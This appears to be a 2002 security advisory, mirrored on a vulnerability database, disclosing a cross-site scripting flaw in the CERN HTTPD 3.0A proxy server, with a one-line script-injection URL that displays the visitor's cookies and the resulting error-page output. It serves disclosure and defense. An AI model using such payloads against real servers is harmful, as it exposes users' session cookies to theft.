Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3368
HistoryAug 16, 2002 - 12:00 a.m.

CERN Proxy Server: Cross-Site Scripting Vulnerability

2002-08-1600:00:00
vulners.com
2107

CERN Proxy Server: Cross-Site Scripting Vulnerability

Affected:
CERN HTTPD 3.0A
http://www.w3.org/Daemon/Activity.html

Vendor Status:
CERN httpd team ([email protected]) was notified on Aug 10, 2001 but
they did not respond.

Exploit:

http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>

========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document:
http://nonexistenthost.google.com/&lt;SCRIPT&gt;document.write&#40;document.cookie&#41;&lt;/SCRIPT&gt;.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
…snip…

Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.
<http://www.securityfocus.com/bid/3087&gt;
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp&gt;
<http://www.securityfocus.com/archive/1/197606&gt;

Best regards,

Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/